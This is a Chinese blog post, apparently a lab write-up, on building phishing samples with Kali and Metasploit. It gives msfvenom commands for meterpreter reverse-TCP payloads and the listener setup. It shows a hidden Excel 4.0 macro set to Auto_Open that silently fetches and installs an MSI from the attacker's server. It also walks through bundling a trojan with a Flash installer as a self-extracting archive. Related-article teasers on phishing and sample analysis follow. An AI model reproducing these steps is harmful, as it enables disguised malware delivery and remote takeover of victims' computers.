社工 钓鱼样本制作

最新推荐文章于 2025-03-15 18:59:18 发布
原创 最新推荐文章于 2025-03-15 18:59:18 发布 · 1k 阅读 · 15 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #网络安全

靶机:32位windows7

攻击机:kali

一、制作恶意的excel钓鱼样本

1、在kali下,生成恶意 msi 文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的IP地址 lport=监听的端口 -f msi -o ok.msi

2、输入命令msfconsole,启动Metasploit 框架,建立监听,run后开始等待payload的连接

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.18.133

set lport 10000

run

3、python在具有恶意的msi的文件夹下开启http服务

python3 -m http.server 80

4、到windows7虚拟机下,新建一个.excel文件,在新建的excel文件的左下角Sheet1处右键,点击插入后,然后点击选择MS Excel 4.0 宏表,点击确定后成功加入宏表

5、在第一格处,输入=EXEC("msiexec /q /ihttp://192.168.18.133/ok.msi"),调用执行服务器上的msi文件

在第二格处,输入=HALT(),标识Excel 4.0宏结束

最后再重新点击第一格,然后在左上角A1模式处输入Auto_Open使excel打开时自动运行宏,再回车

在左下角宏1处点击右键,选择隐藏

按ctrl+s保存,在弹出的页面处点击选否,然后在弹出的另存为界面,点击选择保存类型为Excel启用宏的工作簿(*.xlsm),后点击保存

6、成功另存为一个.xlsm文件之后,点击打开,最后在提示界面宏已被禁用处,点击启用内容

7、最后回到kali,发现windows7已经可以成功连接上了

二、制作正常软件和恶意木马进行捆绑打包钓鱼样本

1、在kali里,生成恶意木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的IP地址 lport=监听的端口 -f exe -o okk.exe

2、在物理机里,复制生成的okk.exe恶意木马到和正常软件flash一起的目录下,然后ctrl点击连选这两个文件后进行捆绑压缩,右键在WinRAR下点击选择添加到压缩文件,然后在弹出的页面点击选择创建自解压格式压缩文件(X)

点击高级选项后,再点击自解压选项(X),然后在弹出来的页面常规框下的解压路径处,输入C:\windows\temp

点击设置,进入设置页面后,在解压后运行框下,输入解压后运行的恶意木马文件的文件名okk.exe和正常软件的文件名flashcenter_pp_ax_install_cn.exe

点击模块,在模块页面处,选择32位的Default32.SFX的自解压模块

最后一直点击确定,生成压缩好的带木马flash.exe文件

3、回到kali虚拟机下,输入命令msfconsole,启动Metasploit 框架,建立监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.18.133

set lport 10101

run

4、将压缩好的flash.exe恶意木马文件复制到windows7虚拟机下,后点击此文件,在弹出的页面处点击安装

5、最后回到kali虚拟机下,可以看到windows7已经成功连接上了

qqy_
关注
[网络安全自学篇] 三十五.恶意代码攻击检测及恶意样本分析
杨秀璋的专栏
12-26 1万+
本文主要结合作者的《系统安全前沿》作业,相关论文及绿盟李东宏老师的博客,从产业界和学术界分别详细讲解恶意代码攻击溯源的相关知识。在学术界方面,用类似于综述来介绍攻击追踪溯源的不同方法;在产业界方面,主要参考李东宏老师从企业恶意样本分析的角度介绍溯源工作。关于攻击溯源的博客和论文都比较少,希望这篇文章对您有所帮助,如果文章中存在错误或理解不到位的地方,还请告知作者与海涵~
46-1 护网溯源 - 钓鱼邮件溯源
weixin_43263566的博客
06-08 772
360安全大脑沙箱云显示,该1111.exe文件存在危险,因此在解压时需要谨慎操作,以免触发木马程序。对钓鱼邮件中的木马程序1111.exe文件进行了分析,提交了360安全大脑沙箱云和微步在线云沙箱。建议使用360压缩软件进行解压,同时注意系统安全,避免不必要的风险。
制作简单的钓鱼样本
weixin_63715632的博客
12-07 288
python在具有恶意的msi的文件夹下开启http服务。把做好的恶意flash放到win7虚拟机中运行。win7 运行自解压后就获取到shell。放在一起用winrar添加到压缩文件。把木马和正常的flash 进行压缩。目标访问excel且启用宏功能时。标识Excel 4.0宏结束。表示调用服务器上的msi。将名字改为容易混淆的。起一个容易混淆的名字。
网页钓鱼---钓鱼网页的制作与危害上线
2302_79590880的博客
10-02 1185
钓鱼攻击,钓鱼页面制作,二维码钓鱼攻击
CVE-2017-11882钓鱼样本构造
weixin_30537391的博客
08-03 171
前言 漏洞详情: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about 最近的一个影响很广泛的漏洞。 据说影响范围: Office 365 Microsoft Office 2000 Microsoft Office 2003 ...
对某钓鱼样本分析
vspiders的博客
08-10 468
HVV期间遇到一个钓鱼样本,用IDA简单分析下样本逻辑及C2信息。
初入门径 --- 护网钓鱼样本分析
abelxu
06-02 725
最近半个月都在学《恶意代码分析实战》,想拿真实的恶意软件进行分析一下。正好朋友发了一个过来。(应该是护网的钓鱼文件) 0x01 文件分析 总共包括三个文件:2021年机关员工(子女)名单.exe、name1.jpg、name2.jpg 2021年机关员工(子女)名单.exe:程序是golang编译的,分析起来有点困难。所以没有进行分析,只是看了一下会有什么行为。 name1.jpg为exe name2.jpg为dll导出了InitBugReport函数,且该函数存在异或解密shellcode的行为。 0
社会工程学技术,制作钓鱼样本
2401_82955039的博客
08-25 500
从原理上来说,社会工程学是通过分析攻击对象的心理弱点、利用人类的本能反应以及人的好奇、贪婪等心理特征进行的,使用诸如假冒、欺骗、引诱等多种手段来达成攻击目标的一种攻击手段。通过本次实验,我掌握了metaspolite的使用,巩固了msf监听的步骤,学会了生成木马的步骤,同时也注意到了端口的使用。1、 通过模拟社会工程学攻击,深入理解其原理和方法;2、制作正常软件和恶意木马进行捆绑打包钓鱼样本。2、了解并掌握社会工程学攻击的常见手段和技巧;1、制作恶意的excel钓鱼样本;3、掌握钓鱼样本制作的方法。
攻防演练布防工作要点,落实防社工钓鱼宣贯
yuanlirong22的专栏
09-06 1095
攻防演练前下发全体攻防演练动员通知,起草全员通知邮件,告知相关演练的注意事项,包括社工防范、钓鱼、禁止私接WiFi等,落实防社工要求和宣贯工作。
如何制作钓鱼链接
最新发布
08-11
从引用内容来看,用户似乎已经接触过一些钓鱼网站的制作教程[^1][^2],甚至包括社工钓鱼样本制作方法[^3]。这些资料展示了内网钓鱼、网站克隆、恶意文件捆绑等具体步骤。不过用户这次更聚焦在"钓鱼链接"这个具体...
Excel-Phish:网络钓鱼密码保护的Excel文件
04-24
Excel钓鱼 网络钓鱼密码保护的Excel文件-由和。 相应的博客文章可以在这里找到:
社工库与网络取证:追踪攻击者与取证分析
本论文全面探讨了社会工程学工具(社工库)与网络取证的相互作用及其在网络安全中的应用。首先,概述了社工库和网络取证的基本概念和重要性。接着,深入分析了网络攻击者的行为模式、社工技巧,以及社工攻击的取证...
社会工程学技术(钓鱼样本制作
2302_80154995的博客
09-06 1051
社会工程学技术(钓鱼样本制作
php 调用 excel 宏_原创干货 | excel钓鱼简介
weixin_39663729的博客
12-06 706
点击关注了解更多精彩内容!!excel钓鱼简介关于excel钓鱼是由来已久的一种攻击方式,目前本人已知的方法有:office宏攻击DDE攻击power query DDE(DDE的一种)office宏攻击宏攻击,一种古老的攻击手法,依靠在office中插入恶意的vbs代码,来执行恶意shellcode。在cs中就有现成的宏攻击。然后按照步骤加入宏,用户在启用宏的情况下即可顺利上线。DDE...
常见的钓鱼招式,可千万别入坑哦
HBohan的博客
10-19 507
OFFICE 【查看资料】 Office安全保护机制 受保护的视图 为了保护计算机不受office病毒侵害,微软设计了一个收保护视图,将所有可疑的office文件以只读方式打开,在该模式下多数编辑功能被禁用。文件呗以受保护视图打开的情况有如下几种 文件是从 Internet 位置打开的 文件是通过 Outlook 附件的方式接收的,并且计算机策略将发件人定义为不安全 文件是从不安全的位置打开的 文件被文件块阻止 文件验证失败 文件是使用“在受保护的视图中打开”选项打开的 文件是从其他人的 OneDr.
浅谈钓鱼攻防之道-制作免杀excel文件钓鱼
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
10-25 1329
如果我告诉你我很厉害,也许你会说我在吹牛。但是如果我告诉你我并不厉害,你肯定知道我在撒谎。
渗透·实验五
Gold_TANG的博客
12-09 267
本次实验,我们学习了社会工程学钓鱼样本制作,学习到了制作钓鱼文件并通过kali连接钓鱼文件获取权限。在Windows系统中,我们通过制作宏定义多重表,宏表内部添加恶意代码,我们将该excel宏表隐藏为正常的表传递给靶机,接着连接恶意代码后门,成功获取权限。另一种是创建压缩包,解压压缩包会执行我们的恶意文件,我们通过文件也能够获取到恶意文件。按照要求把木马flash.exe和正常的安装包进行压缩,制作好捆绑木马。学会制作简单的钓鱼样本并理解钓鱼样本木马的工作原理.在kali中建立监听,成功连接。
Excel宏钓鱼
volta_xu的博客
03-15 495
Excel宏钓鱼是一种利用Office宏功能执行恶意代码的攻击手段。攻击者通过诱导用户启用宏(通常伪装成重要文档),触发恶意VBA代码从远程服务器下载并执行载荷。msiexec:本实验仅用于教育目的,实际实施可能违反相关法律法规。
社工辅助工具制作教程第三课
在本例中,文件名为“第三课:制作一个社工辅助.zip”,这表明它可能是一个系列教程中的第三部分,涉及社工辅助工具的制作。"zip"格式是一种常见的压缩文件格式,用于减小文件体积并便于传输。掌握文件压缩和解压...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值